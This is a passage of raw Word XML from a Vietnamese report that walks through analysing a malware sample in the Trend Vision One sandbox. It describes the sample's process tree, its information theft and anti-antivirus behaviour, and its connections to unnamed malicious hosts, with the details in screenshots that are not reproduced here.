      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Up file lên nếu chọn file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5CAF70" w14:textId="3E352E6A" w:rsidR="00236EF7" w:rsidRPr="00E6744B" w:rsidRDefault="00236EF7" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00236EF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19426ADB" wp14:editId="239CCAEA">
            <wp:extent cx="5943600" cy="2727325"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15875"/>
            <wp:docPr id="2142607535" name="Picture 2142607535"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7535" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, Phần mềm đa phương tiện, Phần mềm đồ họa&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2727325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7273909C" w14:textId="77777777" w:rsidR="008147A1" w:rsidRDefault="008147A1" w:rsidP="00B711B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF09046" w14:textId="68589E32" w:rsidR="008147A1" w:rsidRPr="00E6744B" w:rsidRDefault="008147A1" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả trả về sau khi phân tích xong </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B56F1" w14:textId="40302D7E" w:rsidR="008147A1" w:rsidRPr="00E6744B" w:rsidRDefault="008147A1" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008147A1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="134E0BA0" wp14:editId="03F8A4BE">
            <wp:extent cx="5943600" cy="1237615"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="19685"/>
            <wp:docPr id="2057681523" name="Picture 2057681523" descr="Ảnh có chứa văn bả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1523" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, ảnh chụp màn hình&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1237615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="250844E8" w14:textId="1F3C3DE4" w:rsidR="00D92FD2" w:rsidRPr="00E6744B" w:rsidRDefault="00D92FD2" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lúc </w:t>
      </w:r>
      <w:r w:rsidR="009C16EA" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">này ta có thể </w:t>
      </w:r>
      <w:r w:rsidR="002A6672" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>check Threat Connect để xem luồng hoạt động của threat và có thể download file report về để phân tích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32299DD0" w14:textId="6FAB0C14" w:rsidR="002A6672" w:rsidRPr="00E6744B" w:rsidRDefault="002A6672" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nội dung file report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A261586" w14:textId="4B8F6A09" w:rsidR="002A6672" w:rsidRPr="00E6744B" w:rsidRDefault="00C03E3F" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E3F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30B1F170" wp14:editId="21B01740">
            <wp:extent cx="5943600" cy="3135630"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="111960059" name="Picture 11196005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059" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, Phông chữ, số&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3135630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBBE171" w14:textId="014B7B36" w:rsidR="00C03E3F" w:rsidRPr="00E6744B" w:rsidRDefault="00C03E3F" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sandbox của Trend Vision One sẽ thực hiện chạy trên 2 nền tảng Windows 7 và 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ADC01A" w14:textId="036F1F52" w:rsidR="00EE4C07" w:rsidRDefault="00C03E3F" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Qua mục phân tích môi trường, có thể thấy</w:t>
      </w:r>
      <w:r w:rsidR="000C442C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file mã độc này </w:t>
      </w:r>
      <w:r w:rsidR="00782884">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">có khả năng chống lại </w:t>
      </w:r>
      <w:r w:rsidR="00986F2A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">phần mềm security, </w:t>
      </w:r>
      <w:r w:rsidR="00EE4C07">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hijack, ăn cắp dữ liệu …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B52574" w14:textId="49F18EC1" w:rsidR="00E80C48" w:rsidRDefault="00F50287" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kiểm tra quá trình</w:t>
      </w:r>
      <w:r w:rsidR="00E14C30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> của malware tại Process Graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75D475" w14:textId="39C71E52" w:rsidR="00E14C30" w:rsidRPr="00E6744B" w:rsidRDefault="00E14C30" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E14C30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26E2FD57" wp14:editId="61CD7BF6">
            <wp:extent cx="5943600" cy="1050925"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15875"/>
            <wp:docPr id="308098470" name="Picture 308098470"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8470" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, hàng, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1050925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CFB6BD" w14:textId="6EDF3515" w:rsidR="00E14C30" w:rsidRPr="00E6744B" w:rsidRDefault="008D194E" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi được thực thi, malware gốc sẽ tạo ra 1 </w:t>
      </w:r>
      <w:r w:rsidR="0043003D" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">process con là </w:t>
      </w:r>
      <w:r w:rsidR="00D669EB" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">vwTKSZk.exe nhằm đánh </w:t>
      </w:r>
      <w:r w:rsidR="0084692A" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">cắp thông tin và </w:t>
      </w:r>
      <w:r w:rsidR="00105317" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>có khả năng chống anti</w:t>
      </w:r>
      <w:r w:rsidR="00E22E74" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-virus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1FEA7D" w14:textId="45CDB2CD" w:rsidR="00107461" w:rsidRDefault="009179F2" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Phân tích chi tiết hơn về hành vi của malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688BCE39" w14:textId="4996914B" w:rsidR="009179F2" w:rsidRPr="00E6744B" w:rsidRDefault="009179F2" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009179F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AE14DD2" wp14:editId="219243FF">
            <wp:extent cx="5895109" cy="2289810"/>
            <wp:effectExtent l="19050" t="19050" r="10795" b="15240"/>
            <wp:docPr id="1259895351" name="Picture 125989535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5351" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, Phông chữ, hàng, số&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5895743" cy="2290056"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6BA8E5" w14:textId="6D6CFB92" w:rsidR="00F443BD" w:rsidRPr="00E6744B" w:rsidRDefault="00F443BD" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tại mục Hijack, </w:t>
      </w:r>
      <w:r w:rsidR="00A34620" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>malware đã thực thi lệnh nhằm mục đích đánh cắp thông tin về hệ thống</w:t>
      </w:r>
      <w:r w:rsidR="00FD5956" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0541A920" w14:textId="5AF67808" w:rsidR="009361BE" w:rsidRPr="00E6744B" w:rsidRDefault="009361BE" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00BD70D2" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ình ảnh chi tiết hơn về tiến trình của malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B997D56" w14:textId="4A9E9778" w:rsidR="009361BE" w:rsidRPr="00E6744B" w:rsidRDefault="009361BE" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009361BE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4125AB90" wp14:editId="6103F6E9">
            <wp:extent cx="5943600" cy="2139950"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12700"/>
            <wp:docPr id="321186508" name="Picture 32118650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6508" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, Phông chữ, số&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2139950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73CB11" w14:textId="77777777" w:rsidR="006040D9" w:rsidRDefault="006040D9" w:rsidP="00F443BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E863BA1" w14:textId="7A461A90" w:rsidR="00856983" w:rsidRPr="00E6744B" w:rsidRDefault="00856983" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kiểm tra trên Sanbox Windows 10, ta sẽ thấy có kết </w:t>
      </w:r>
      <w:r w:rsidR="003B7725" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nối remote tới </w:t>
      </w:r>
      <w:r w:rsidR="00314F40" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>malicious host</w:t>
      </w:r>
      <w:r w:rsidR="007E0AEE" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> và querry tới một số domain lạ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E7C506" w14:textId="77777777" w:rsidR="00E6744B" w:rsidRDefault="007E0AEE" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E0AEE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4601975B" wp14:editId="37E6B9B8">
            <wp:extent cx="5943600" cy="2681605"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="23495"/>
            <wp:docPr id="539168848" name="Picture 53916884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8848" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2681605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E010D1" w14:textId="6DA7C2C4" w:rsidR="007E0AEE" w:rsidRPr="00E6744B" w:rsidRDefault="00631274" w:rsidP="00E6744B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00631274">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="433379CE" wp14:editId="39A3535E">
            <wp:extent cx="5943600" cy="1431290"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="16510"/>
            <wp:docPr id="575987131" name="Picture 57598713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7131" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, Phông chữ, số, hàng&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1431290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="581BBF97" w14:textId="35AE45A2" w:rsidR="0014406D" w:rsidRDefault="0014406D" w:rsidP="00E6744B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Qua đó ta có thể thấy malware này sẽ thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="0082278F" w:rsidRPr="00E6744B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ăn cắp thông tin hệ thống, nếu hệ thống sử dụng Windows 10 sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00A23BFA" w:rsidRPr="00E6744B">
        <w:rPr>
